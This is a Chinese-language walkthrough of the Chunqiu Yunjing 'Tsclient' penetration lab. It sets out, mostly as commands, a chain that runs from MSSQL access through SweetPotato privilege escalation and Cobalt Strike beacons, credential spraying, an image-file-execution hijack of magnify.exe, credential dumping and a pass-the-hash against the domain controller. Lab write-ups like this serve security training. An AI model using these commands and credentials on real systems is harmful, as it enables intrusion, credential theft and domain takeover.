【内网渗透】最保姆级的春秋云镜Tsclient打靶笔记

本文主要是介绍【内网渗透】最保姆级的春秋云镜Tsclient打靶笔记，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

目录

①fscan扫mssql账密，MDUT拿shell

②sweetpotato提权，cs拿shell

③John用户进程注入，读共享文件

④fscan扫内网，frp内网穿透

⑤喷洒密码，修改密码

⑥RDP远程桌面连接

⑦映像劫持提权

⑧不出网转发上线CS

⑨PTH

---

①fscan扫mssql账密，MDUT拿shell

GitHub - SafeGroceryStore/MDUT: MDUT - Multiple Database Utilization Tools 

 

②sweetpotato提权，cs拿shell

sqlsever权限很低

上传SweetPotato提权 

 

C:/Users/Public/sweetpotato.exe -a "whoami"

 再执行上传的cs马

C:/Users/Public/sweetpotato.exe -a "C:/Users/Public/beacon_x64.exe"

成功上线 

读到flag1 

shell type C:\Users\Administrator\flag\flag01.txt

③John用户进程注入，读共享文件

 查看在线用户

shell quser || qwinst

有在线用户可以用CS注入进程上线 

Cobalt Strike进程注入-CSDN博客 

 

成功上线John 

 

用John查看共享资源 

shell net use

 列目录读文件

shell dir \\tsclient\c

 

shell type \\tsclient\c\credential.txt

拿到一套账密，并提示打映像劫持

④fscan扫内网，frp内网穿透

上传fscan和frp相关

 

frp相关操作可以参考上篇文章：

【内网渗透】最保姆级的春秋云镜initial打靶笔记-CSDN博客

 

⑤喷洒密码，修改密码

proxychains crackmapexec smb 172.22.8.1/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null

提示STATUS_PASSWORD_EXPIRED也就是密码过期了，需要使用smbpasswd进行修改密码

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

proxychains python smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Z3r4y@401'

 

⑥RDP远程桌面连接

测出来只有172.22.8.46可以连接

proxychains4 rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Z3r4y@401' -r disk:share=/home/kali/Desktop/tmp

 

⑦映像劫持提权

致敬经典，选择用放大镜提权

映像劫持的几种利用方式 - FreeBuf网络安全行业门户

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

开始->锁定 

 点击放大镜

成功提权 

读到flag2 

type C:\Users\Administrator\flag\flag02.txt

 

⑧不出网转发上线CS

不出网主机上线到CobaltStrike的方式_cs转发上线模块-CSDN博客

172.22.8.46不出网，用172.22.8.18转发上线CS 

 

 

 

 用放大镜执行CS马

C:\Users\Aldrich\Desktop\beacon.exe

成功以SYSTEM上线 

 

 

⑨PTH

查看域管成员

shell net group "domain admins" /domain

抓取密码 

logonpasswords

用PTH打DC，读到flag3

proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 374e0bdc02e3dbac0bb75c921560a337 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"

这篇关于【内网渗透】最保姆级的春秋云镜Tsclient打靶笔记的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---